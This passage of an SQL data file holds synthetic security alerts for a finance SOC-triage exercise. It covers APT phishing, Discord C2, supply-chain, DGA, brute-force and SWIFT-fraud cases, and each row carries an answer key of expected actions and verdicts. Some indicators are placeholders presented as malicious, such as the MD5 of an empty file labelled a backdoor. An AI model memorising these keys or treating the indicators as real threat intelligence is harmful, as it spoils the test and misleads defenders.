(1776, 'APT41 Spear-Phishing Attempt with Malicious Attachment', 'high', 'MISP', 'A spear-phishing email was detected targeting finance employees with a malicious Excel attachment that exploits a zero-day vulnerability.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"FIN-EXCH-01\",\"email_sender\":\"hr@fakedomain.com\",\"subject\":\"Urgent: Q1 Financial Report\",\"attachment_name\":\"Financial_Report_Q1.xls\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"hr@fakedomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain involved in multiple spear-phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Excel zero-day exploit\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and included a file hash associated with zero-day exploits.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.267Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"FIN-EXCH-01\\\",\\\"email_sender\\\":\\\"hr@fakedomain.com\\\",\\\"subject\\\":\\\"Urgent: Q1 Financial Report\\\",\\\"attachment_name\\\":\\\"Financial_Report_Q1.xls\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1777, 'Lazarus Group Using Discord for C2 Communication', 'critical', 'ThreatConnect', 'Lazarus Group has been detected using Discord as a C2 channel to control malware on compromised financial systems.', 'Data Exfil', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T02:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.2\",\"username\":\"asmith\",\"hostname\":\"FIN-SERV-09\",\"domain\":\"discordapp.com\",\"url\":\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to C2 infrastructure for Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for C2 communication by known APT group\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"discordapp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain frequently used in benign and malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network traffic indicates data exfiltration via Discord, associated with the Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.269Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.2\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"FIN-SERV-09\\\",\\\"domain\\\":\\\"discordapp.com\\\",\\\"url\\\":\\\"https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyz\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1778, 'Cozy Bear Supply Chain Attack - Malicious Software Update', 'critical', 'Recorded Future', 'A software update from a compromised vendor was detected, containing a backdoor used by Cozy Bear to infiltrate financial systems.', 'Malware', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T01:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"hostname\":\"FIN-APP-03\",\"command_line\":\"C:\\\\Program Files\\\\Vendor\\\\Update\\\\updater.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cozy Bear backdoor\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Vendor\\\\Update\\\\updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable used in known supply chain attack\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The update process executed a binary with a hash linked to Cozy Bear\'s backdoor.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T01:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"hostname\\\":\\\"FIN-APP-03\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Vendor\\\\\\\\Update\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1779, 'Fancy Bear Fast-Flux DNS and DGA Domain Activity Detected', 'high', 'Anomali', 'Fancy Bear is using fast-flux DNS and DGA-generated domains to obscure command and control communications targeting financial institutions.', 'C2 Communication', 'T1568.003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T00:50:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.75\",\"dst_ip\":\"203.0.113.250\",\"hostname\":\"FIN-NET-05\",\"domain\":\"xyzt1234.com\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.250\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in fast-flux DNS activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xyzt1234.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"DGA domain used for C2 by Fancy Bear\"}}],\"expected_actions\":[\"block_domain\",\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The domain and IP are consistent with fast-flux and DGA activities linked to Fancy Bear.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.273Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1780, 'Unauthorized Login Attempts from Suspicious IP', 'medium', 'Anomali', 'Multiple failed login attempts detected on a financial system from a foreign IP address. This activity is consistent with brute force attempts.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T04:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.3.20\",\"username\":\"mjones\",\"hostname\":\"FIN-AUTH-01\",\"failed_attempts\":8}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in multiple non-malicious login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjones\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username commonly targeted in brute force simulations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts were traced back to an internal security exercise, confirming benign activity.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:57:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for 
invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:56:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:55:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:54:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" 
| head 100\"}}', 0),
(1781, 'Fancy Bear Exploiting SWIFT Network for Transaction Manipulation', 'critical', 'Recorded Future', 'Fancy Bear is suspected of manipulating financial transactions through SWIFT network vulnerabilities, leading to unauthorized money transfers.', 'Fraud', 'T1503', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"203.0.113.55\",\"username\":\"financeadmin\",\"hostname\":\"SWIFT-TRANS-01\",\"request_body\":\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in known SWIFT network attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious transaction pattern matching known fraud cases\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"fraud\",\"analysis_notes\":\"The network traffic indicates unauthorized transaction attempts via SWIFT, matching Fancy Bear\'s TTPs.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO 
ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO 